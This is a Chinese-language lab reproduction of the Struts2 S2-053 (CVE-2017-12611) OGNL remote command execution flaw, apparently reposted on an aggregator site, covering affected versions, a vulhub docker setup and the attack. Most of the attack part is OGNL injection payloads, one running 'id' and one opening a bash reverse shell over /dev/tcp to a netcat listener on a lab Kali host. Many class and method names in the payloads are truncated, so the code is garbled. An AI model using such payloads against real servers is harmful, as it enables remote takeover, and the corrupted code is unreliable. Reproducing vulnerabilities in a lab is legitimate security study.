2023年12月9日發(作者:年終獎怎么發)

CVE-2017-12611(【S2-053】Struts2遠程命令執行漏洞)漏洞復現
一:漏洞描述
Struts2在使用Freemarker模塊引擎的時候,同時允許解析OGNL表達式。導致用戶輸入的數據本身不會被OGNL解析,但是由于被
Freemarker解析一次后變成離開一個表達式,被OGNL解析第二次,導致任意命令執行漏洞。
二:受影響的版本
Struts 2.0.1-struts 2.3.33
Struts 2.5-Struts 2.5.10
三:環境搭建(192.168.33.144)
1、使用docker搭建環境
cd vulhub/struts2/s2-053
2、一鍵搭建環境
docker-compo up -d
3、訪問:192.168.33.144:8080/。
四:攻擊
1、在Your url中寫入POC
POC:
%{(#dm=@ntext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['mphony.x
ner']).(#ognlUtil=#tance(@il@class)).(#ludedPackageNa
mes().clear()).(#ludedClass().clear()).(#berAccess(#dm)))).(#cmd='id').(#iswin=(@@getProperty('
e').toLowerCa().contains('win'))).(#cmds=(#iswin?{'','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new sBuilder(#cmds)).(#ctErr
orStream(true)).(#process=#()).(@s@toString(#utStream()))}2、點擊submit。4、反彈shell,把shell反彈到kali上(kali:192.168.33.146)nc -lvvp 1234填寫POC%{(#dm=@ntext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['ner']).(#ognlUtil=#tance(@il@class)).(#ludedPackageNames().clear()).(#ludedClass().clear()).(#berAccess(#dm)))).(#cmd='bash -i >& /dev/tcp/192.168.33.146/1234 0>&1').(#iswin=(@@getProperty('').toLowerCa().contains('win'))).(#cmds=(#iswin?{'','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new sBuilder(#cmds)).(#ctErrorStream(true)).(#process=#()).(@s@toString(#utStream()))}kali上成功反彈shell
本文發布于:2023-12-09 21:24:29,感謝您對本站的認可!
本文鏈接:http://www.newhan.cn/zhishi/a/1702128269116497.html
版權聲明:本站內容均來自互聯網,僅供演示用,請勿用于商業和其他非法用途。如果侵犯了您的權益請與我們聯系,我們將在24小時內刪除。
本文word下載地址:CVE-2017-12611(【S2-053】Struts2遠程命令執行漏洞)漏洞復現.doc
本文 PDF 下載地址:CVE-2017-12611(【S2-053】Struts2遠程命令執行漏洞)漏洞復現.pdf
| 留言與評論(共有 0 條評論) |